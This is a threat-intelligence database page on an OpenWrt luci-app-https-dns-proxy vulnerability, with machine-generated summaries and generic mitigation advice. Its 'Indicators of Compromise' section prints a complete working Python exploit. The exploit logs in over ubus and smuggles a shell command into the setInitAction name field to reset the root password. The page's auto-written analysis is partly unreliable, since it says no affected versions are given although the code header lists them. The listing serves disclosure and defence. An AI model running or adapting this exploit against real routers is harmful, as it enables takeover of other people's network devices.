OpenWrt 23.05 - Authenticated Remote Code Execution (RCE)
An authenticated remote code execution vulnerability exists in OpenWrt 23. 05. This exploit allows an attacker with valid credentials to execute arbitrary code on the affected system remotely. Exploit code is publicly available in Python, indicating potential for exploitation by skilled attackers. No patch or official remediation information is currently provided. The vulnerability is classified as critical due to the ability to execute code remotely with authentication.
AI Analysis
Technical Summary
OpenWrt 23.05 contains an authenticated remote code execution vulnerability that enables attackers with valid credentials to execute arbitrary commands remotely on the device. The exploit has been publicly disclosed with proof-of-concept code written in Python. No affected versions or patch information is specified, and the vendor advisory status is not provided. This vulnerability requires authentication, which limits exposure to attackers who can authenticate but still represents a critical risk due to remote code execution capability.
Potential Impact
Successful exploitation allows an authenticated attacker to execute arbitrary code remotely on OpenWrt 23.05 devices. This can lead to full system compromise, unauthorized control, and potential disruption of network services. The presence of public exploit code increases the risk of exploitation by malicious actors.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to the management interface to trusted users only and monitor for suspicious activity. No vendor advisory or patch information is currently provided to confirm remediation.
Indicators of Compromise
- exploit-code: # Exploit Title: OpenWrt 23.05 - Authenticated Remote Code Execution (RCE) # Date: 2026-01-17 # Exploit Author: Ahmet Mersin # Vendor Homepage: https://github.com/stangri/luci-app-https-dns-proxy # Software Link: https://github.com/stangri/luci-app-https-dns-proxy # Version: All versions prior to 2026-01-17 # Tested on: OpenWrt 23.05 # CVE : Pending """ OpenWrt luci-app-https-dns-proxy Root Takeover Exploit CVE-202X-XXXXX - Local Privilege Escalation via Command Injection import requests import sys import getpass def banner(): print(""" ╔═══════════════════════════════════════════════════════════════╗ ║ OpenWrt https-dns-proxy Root Takeover Exploit ║ ║ CVE-202X-XXXXX | Privilege Escalation via Command Injection ║ ║ ║ ║ Developed by: ahmetmersin.com ║ ╚═══════════════════════════════════════════════════════════════╝ """) def get_user_input(): print("[*] Target Router Information:") target_ip = input(" Router IP [192.168.1.1]: ").strip() or "192.168.1.1" print("\n[*] Limited User Credentials (user with https-dns-proxy ACL):") username = input(" Username: ").strip() if not username: print("[-] Username cannot be empty!") sys.exit(1) password = getpass.getpass(" Password: ") if not password: print("[-] Password cannot be empty!") sys.exit(1) print("\n[*] New Root Password:") new_root_pass = getpass.getpass(" Enter new root password: ") if not new_root_pass: print("[-] Password cannot be empty!") sys.exit(1) confirm_pass = getpass.getpass(" Confirm new root password: ") if new_root_pass != confirm_pass: print("\n[-] Passwords do not match!") sys.exit(1) return target_ip, username, password, new_root_pass def login(target_ip, username, password): print(f"\n[*] Authenticating as '{username}'...") endpoint = f"http://{target_ip}/ubus" payload = { "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "00000000000000000000000000000000", "session", "login", {"username": username, "password": password} ] } try: r = requests.post(endpoint, json=payload, timeout=10) response = r.json() if "result" in response and response["result"] and len(response["result"]) > 1: result = response["result"][1] if "ubus_rpc_session" in result: token = result["ubus_rpc_session"] print(f"[+] Login successful! Session token: {token[:16]}...") # Check if user has the vulnerable permission acls = result.get("acls", {}).get("ubus", {}) if "luci.https-dns-proxy" in acls: if "setInitAction" in acls["luci.https-dns-proxy"]: print(f"[+] User has access to vulnerable function!") return token, endpoint print("[-] User does not have 'setInitAction' permission!") return None, None print(f"[-] Login failed: {response}") return None, None except requests.exceptions.ConnectionError: print(f"[-] Connection error: Cannot reach {target_ip}") return None, None except Exception as e: print(f"[-] Error: {e}") return None, None def change_root_password(endpoint, session_id, new_password): print(f"\n[*] Changing root password...") # Payload: Use passwd with printf to change root password malicious_name = f"x; printf '{new_password}\\n{new_password}\\n' | passwd root; echo done >" payload = { "jsonrpc": "2.0", "id": 666, "method": "call", "params": [ session_id, "luci.https-dns-proxy", "setInitAction", {"name": malicious_name, "action": "start"} ] } try: r = requests.post(endpoint, json=payload, timeout=10) response = r.json() print(f"[*] Response: {response}") # Check if result is True (command executed successfully) if "result" in response and len(response["result"]) > 1: result_data = response["result"][1] if isinstance(result_data, dict) and result_data.get("result") == True: print(f"\n" + "="*60) print(f"[+] EXPLOIT SUCCESSFUL!") print(f"="*60) ip = endpoint.split('//')[1].split('/')[0] print(f"\n[*] You can now login with the new root password:") print(f" ssh root@{ip}") print(f" Password: <your new password>") return True else: print(f"\n" + "="*60) print(f"[-] EXPLOIT FAILED - Command was blocked!") print(f"="*60) print(f"\n[!] The target may have been patched.") return False else: print(f"[-] Unexpected response format") return False except Exception as e: print(f"[-] Error: {e}") return False def main(): banner() print("[!] WARNING: This tool is for authorized security testing only!") print("[!] Unauthorized access to computer systems is illegal.\n") confirm = input("Do you have permission to test this target? [y/N]: ").strip().lower() if confirm != 'y': print("Aborted.") sys.exit(0) target_ip, username, password, new_root_pass = get_user_input() session_id, endpoint = login(target_ip, username, password) if session_id: success = change_root_password(endpoint, session_id, new_root_pass) if success: print("\n[+] Exploit completed! Test SSH access with the new password.") else: print("\n[-] Authentication failed. Exploit aborted.") sys.exit(1) if __name__ == "__main__": main()
OpenWrt 23.05 - Authenticated Remote Code Execution (RCE)
Description
An authenticated remote code execution vulnerability exists in OpenWrt 23. 05. This exploit allows an attacker with valid credentials to execute arbitrary code on the affected system remotely. Exploit code is publicly available in Python, indicating potential for exploitation by skilled attackers. No patch or official remediation information is currently provided. The vulnerability is classified as critical due to the ability to execute code remotely with authentication.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
OpenWrt 23.05 contains an authenticated remote code execution vulnerability that enables attackers with valid credentials to execute arbitrary commands remotely on the device. The exploit has been publicly disclosed with proof-of-concept code written in Python. No affected versions or patch information is specified, and the vendor advisory status is not provided. This vulnerability requires authentication, which limits exposure to attackers who can authenticate but still represents a critical risk due to remote code execution capability.
Potential Impact
Successful exploitation allows an authenticated attacker to execute arbitrary code remotely on OpenWrt 23.05 devices. This can lead to full system compromise, unauthorized control, and potential disruption of network services. The presence of public exploit code increases the risk of exploitation by malicious actors.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to the management interface to trusted users only and monitor for suspicious activity. No vendor advisory or patch information is currently provided to confirm remediation.
Technical Details
- Edb Id
- 52521
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for OpenWrt 23.05 - Authenticated Remote Code Execution (RCE)
# Exploit Title: OpenWrt 23.05 - Authenticated Remote Code Execution (RCE) # Date: 2026-01-17 # Exploit Author: Ahmet Mersin # Vendor Homepage: https://github.com/stangri/luci-app-https-dns-proxy # Software Link: https://github.com/stangri/luci-app-https-dns-proxy # Version: All versions prior to 2026-01-17 # Tested on: OpenWrt 23.05 # CVE : Pending """ OpenWrt luci-app-https-dns-proxy Root Takeover Exploit CVE-202X-XXXXX - Local Privilege Escalation via Command Injection import requests impo... (5652 more characters)
Threat ID: 69f1f0fdcbff5d8610047e4e
Added to database: 4/29/2026, 11:52:29 AM
Last enriched: 4/29/2026, 11:53:10 AM
Last updated: 4/30/2026, 3:42:36 AM
Views: 9
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.